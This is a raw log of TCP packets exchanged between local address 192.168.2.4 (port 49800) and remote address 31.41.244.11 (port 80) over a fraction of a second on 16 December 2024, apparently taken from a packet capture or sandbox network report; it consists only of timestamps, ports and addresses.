                                                                                                                                                                                              Dec 16, 2024 01:01:26.190746069 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.190773010 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.190818071 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.191680908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.191731930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.191787958 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.191834927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.192627907 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.192738056 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.192801952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.193603992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.193715096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.193783998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.194605112 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.194716930 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.194782972 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.195573092 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.195635080 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.195674896 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.195719957 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.196521997 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.196584940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.196615934 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.196666002 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.197475910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.197608948 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.197665930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.198466063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.198574066 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.198604107 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.198648930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.199454069 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.199510098 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.199557066 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.199601889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.200432062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.200490952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.200536966 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.200586081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.201395988 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.201452017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.201500893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.201545954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.202404976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.202454090 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.202511072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.203339100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.203402042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.203438997 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.203468084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.204299927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.204350948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.204399109 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.204444885 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.205260992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.205321074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.205367088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.205413103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.206274033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.206418991 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.206470966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.207225084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.207274914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.207329988 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.207372904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.208182096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.208249092 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.208297014 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.208436966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.209212065 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.209270000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.209300041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.209343910 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.210129976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.210202932 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.210244894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.210283995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.211112976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.211177111 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.211292028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.211339951 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.212055922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.212112904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.212181091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.212430000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.213042021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.213097095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.213141918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.213186026 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.214023113 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.214076042 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.214155912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.214211941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.214989901 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.215032101 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.215111971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.215152025 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.215965033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.216002941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.216048002 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.216092110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.216945887 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.217072010 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.217087984 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.217106104 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.217931032 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.218045950 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.218086958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.218884945 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.218935966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.218991041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.219031096 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.219845057 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.219887018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.219966888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.220010042 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.220830917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.220938921 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.220982075 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.221811056 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.221865892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.221882105 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.221920967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.222779989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.222829103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.222856998 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.222954988 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.223793983 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.223854065 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.223895073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.223942995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.224726915 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.224771976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.224818945 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.224859953 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.225657940 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.229451895 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.299916983 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.299937963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.299988031 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.300028086 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.300075054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.300105095 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.300147057 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.301012039 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.301057100 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.301268101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.301320076 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.302021980 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.302078962 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.302119970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.302165031 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.370779991 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.370805979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.370909929 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.371093035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.371124983 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.371151924 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.371184111 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.371866941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.371885061 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.371946096 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.372561932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.372622013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.372858047 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.372910023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.372998953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.373045921 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.373781919 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.373863935 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.373915911 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.374654055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.374711990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.374726057 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.374762058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.375549078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.375591993 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.375686884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.375727892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.376461983 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.376508951 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.376532078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.376580954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.377343893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.377427101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.377477884 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.378247976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.378293991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.378325939 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.378369093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.379163027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.379214048 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.379245043 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.379292965 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.380028009 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.380089045 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.380114079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.380153894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.380951881 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.380981922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.381011009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.381033897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.381839991 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.381912947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.381969929 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.382713079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.382766962 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.382803917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.382844925 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.383611917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.383652925 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.383692026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.383734941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.384496927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.384537935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.384577036 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.384618998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.385394096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.385493994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.385535002 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.386332989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.386384964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.386425018 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.386471033 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.387224913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.387271881 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.387291908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.387341022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.388102055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.388148069 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.388204098 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.388247013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.388981104 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.389024019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.389065981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.389108896 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.389887094 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.389981031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.390033960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.390784979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.390836000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.390863895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.390903950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.391737938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.391767025 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.391782999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.391808987 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.392587900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.392633915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.392667055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.392707109 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.393486977 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.393528938 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.393568039 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.393609047 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.394779921 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.394821882 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.394985914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.395026922 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.395294905 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.395342112 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.395376921 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.395421028 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.396204948 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.396251917 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.396282911 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.396330118 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.397073984 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.397150040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.397197962 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.397964954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.398020029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.398056030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.398097992 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.398861885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.398914099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.398960114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.399003029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.399749994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.399796963 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.399842978 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.399888039 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.400641918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.400695086 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.400741100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.400789022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.401559114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.401675940 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.401731968 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.402431965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.402487040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.402532101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.402580976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.403331995 CET804980031.41.244.11192.168.2.4
